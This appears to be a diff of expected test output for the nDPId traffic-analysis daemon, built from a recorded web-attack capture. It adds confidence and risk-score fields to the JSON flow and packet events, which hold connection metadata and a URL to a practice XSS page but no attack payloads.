 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":378,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347607344,"flow_last_seen":1499347612785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347731552,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59002,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":379,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347608596,"flow_last_seen":1499347613787,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347731552,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59016,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":379,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347608596,"flow_last_seen":1499347613787,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347731552,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59016,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":379,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347608596,"flow_last_seen":1499347613787,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347731552,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59016,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":381,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347612465,"flow_last_seen":1499347617785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347731552,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59056,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":381,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347612465,"flow_last_seen":1499347617785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347731552,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59056,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":381,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347612465,"flow_last_seen":1499347617785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347731552,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59056,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":382,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347613718,"flow_last_seen":1499347618787,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347731552,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59070,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":382,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347613718,"flow_last_seen":1499347618787,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347731552,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59070,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":382,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347613718,"flow_last_seen":1499347618787,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347731552,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59070,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00700{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"finished","flow_packets_processed":315,"flow_first_seen":1499347547687,"flow_last_seen":1499347614979,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1870,"flow_tot_l4_payload_len":232682,"flow_avg_l4_payload_len":738,"midstream":0,"ts_msec":1499347731552,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58360,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00806{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"finished","flow_packets_processed":315,"flow_first_seen":1499347547687,"flow_last_seen":1499347614979,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1870,"flow_tot_l4_payload_len":232682,"flow_avg_l4_payload_len":738,"midstream":0,"ts_msec":1499347731552,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58360,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":451,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347731797,"flow_last_seen":1499347731797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347731797,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60342,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":451,"flow_packet_id":1,"flow_last_seen":1499347731797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347731797,"pkt":"ABm5CmnxAMGxFOsxCABFAAA84K9AAD4G5SCsEAABwKgKMuu2AFCGTjKNAAAAAKACchDmwwAAAgQFtAQCCAoBO9IiAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":451,"flow_packet_id":2,"flow_last_seen":1499347731797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347731797,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ67ZFR3+Dhk4yjqAScSB7XAAAAgQFtAQCCAoD5aOWATvSIgEDAwc="}
@@ -2591,17 +2591,17 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":457,"flow_packet_id":1,"flow_last_seen":1499347740751,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347740751,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8V35AAD4GblKsEAABwKgKMuwWAFBKCo2eAAAAAKACchC+2AAAAgQFtAQCCAoBO9rgAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6455,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":457,"flow_packet_id":2,"flow_last_seen":1499347740751,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347740751,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7Bb1vAeUSgqNn6AScSASLAAAAgQFtAQCCAoD5axVATva4AEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6456,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":457,"flow_packet_id":3,"flow_last_seen":1499347740752,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347740752,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0V39AAD4GblmsEAABwKgKMuwWAFBKCo2f9bwHlYAQAOWxMwAAAQEICgE72uAD5axV"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":383,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347616210,"flow_last_seen":1499347621787,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347741765,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59096,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":383,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347616210,"flow_last_seen":1499347621787,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347741765,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59096,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":383,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347616210,"flow_last_seen":1499347621787,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347741765,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59096,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":384,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347617491,"flow_last_seen":1499347622787,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347741765,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59110,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":384,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347617491,"flow_last_seen":1499347622787,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347741765,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59110,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":384,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347617491,"flow_last_seen":1499347622787,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347741765,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59110,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":385,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347618757,"flow_last_seen":1499347623788,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347741765,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59124,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":385,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347618757,"flow_last_seen":1499347623788,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347741765,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59124,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":385,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347618757,"flow_last_seen":1499347623788,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347741765,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59124,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":386,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347621256,"flow_last_seen":1499347626789,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347741765,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59150,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":386,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347621256,"flow_last_seen":1499347626789,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347741765,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59150,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":386,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347621256,"flow_last_seen":1499347626789,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347741765,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59150,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":387,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347622524,"flow_last_seen":1499347627790,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347741765,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59164,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":387,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347622524,"flow_last_seen":1499347627790,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347741765,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59164,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":387,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347622524,"flow_last_seen":1499347627790,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347741765,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59164,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":388,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347623786,"flow_last_seen":1499347628791,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347741765,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59178,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":388,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347623786,"flow_last_seen":1499347628791,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347741765,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59178,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":388,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347623786,"flow_last_seen":1499347628791,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347741765,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59178,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6472,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347743331,"flow_last_seen":1499347743331,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347743331,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60464,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6472,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":458,"flow_packet_id":1,"flow_last_seen":1499347743331,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347743331,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8iytAAD4GOqWsEAABwKgKMuwwAFCeqlZOAAAAAKACchCe6QAAAgQFtAQCCAoBO91lAAAAAAEDAwc="}
@@ -2611,7 +2611,7 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6484,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":459,"flow_packet_id":1,"flow_last_seen":1499347744595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347744595,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8iGtAAD4GPWWsEAABwKgKMuw+AFAw9lbKAAAAAKACchAK2AAAAgQFtAQCCAoBO96hAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6485,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":459,"flow_packet_id":2,"flow_last_seen":1499347744595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347744595,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7D5E+wDpMPZWy6AScSAR1wAAAgQFtAQCCAoD5bAWATveoQEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6486,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":459,"flow_packet_id":3,"flow_last_seen":1499347744595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347744595,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0iGxAAD4GPWysEAABwKgKMuw+AFAw9lbLRPsA6oAQAOWw3gAAAQEICgE73qED5bAW"}
-00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6505,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347743331,"flow_last_seen":1499347746913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"ts_msec":1499347746913,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60464,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
+00966{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6505,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347743331,"flow_last_seen":1499347746913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"ts_msec":1499347746913,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60464,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6509,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":460,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347747187,"flow_last_seen":1499347747187,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347747187,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60504,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
